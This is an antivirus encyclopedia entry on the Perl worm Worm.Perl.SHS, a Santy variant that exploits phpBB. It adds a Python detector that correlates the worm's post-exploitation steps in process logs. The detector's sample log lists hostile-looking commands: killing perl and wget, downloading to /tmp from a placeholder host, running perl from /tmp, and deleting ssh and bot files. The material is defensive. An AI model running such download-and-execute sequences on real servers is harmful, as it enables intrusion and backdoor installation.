
Worm.Perl.SHS.{A-B}


First posted on 21 November 2011.
Source: BitDefender

Aliases :

Worm.Perl.SHS.{A-B} is also known as Net-Worm.Perl.Santy.d (KAV).

Explanation :

The virus is a Perl script, supposedly developed from the Worm.PhpBB.Santy.A source code.

It uses a vulnerability in the phpBB forum code to propagate itself. The list of target sites is obtained from Google search and Yahoo Cade search (version A) or Yahoo Cade and AOL Search (version B).

After finding a suitable target, the virus attempts to exploit the phpBB code. If the code is vulnerable, the exploit runs several commands:

- kills all perl and wget processes
- downloads the worm and a Perl-scripted backdoor (Backdoor.Perl.Shellcode.B) to the /tmp directory
- starts the worm and the backdoor
- deletes all ssh.* and bot* files in the tmp directory
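
The four post-exploitation behaviours listed above can be correlated in process-execution logs from a web server. The following is an added detection example, not code from BitDefender or from the worm. The log format ("epoch user command line"), the sample records, the placeholder file names and host, the use of wget/curl as the download tool, and the 60-second window are all assumptions.

```python
import fnmatch
from collections import defaultdict

# Constructed sample records (not from a real incident); names are placeholders.
SAMPLE_LOG = """\
1000 www-data killall -9 perl wget
1002 www-data wget -q -O /tmp/PLACEHOLDER_worm http://example.invalid/a
1005 www-data perl /tmp/PLACEHOLDER_worm
1007 www-data rm -f /tmp/ssh.1 /tmp/bot.txt
1500 alice wget -O /home/alice/report.pdf http://example.invalid/report.pdf
1600 backup rm -f /tmp/backup.lock
"""

def classify(argv):
    """Map one command line to a behaviour from the list above, or None."""
    tool, args = argv[0].rsplit("/", 1)[-1], argv[1:]
    in_tmp = [a for a in args if a.startswith("/tmp/")]
    if tool in ("killall", "pkill") and {"perl", "wget"} & set(args):
        return "kill_perl_wget"
    if tool in ("wget", "curl") and in_tmp:  # download tool is an assumption
        return "download_to_tmp"
    if tool == "perl" and in_tmp:
        return "perl_run_from_tmp"
    if tool == "rm" and any(fnmatch.fnmatch(a.rsplit("/", 1)[-1], pat)
                            for a in in_tmp for pat in ("ssh.*", "bot*")):
        return "tmp_cleanup"
    return None

def detect(log_text, window=60, threshold=3):
    """Return {user: behaviours} for users showing at least `threshold`
    distinct behaviours within `window` seconds."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue  # skip malformed records
        tag = classify(parts[2].split())
        if tag:
            hits[parts[1]].append((int(parts[0]), tag))
    alerts = {}
    for user, events in hits.items():
        for start, _ in sorted(events):
            seen = {t for ts, t in events if start <= ts <= start + window}
            if len(seen) >= threshold:
                alerts[user] = sorted(seen)
                break
    return alerts
```

Requiring several distinct behaviours from the same account in a short window keeps ordinary single events, such as a lone download or a routine /tmp cleanup, from raising an alert.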

Last update 21 November 2011
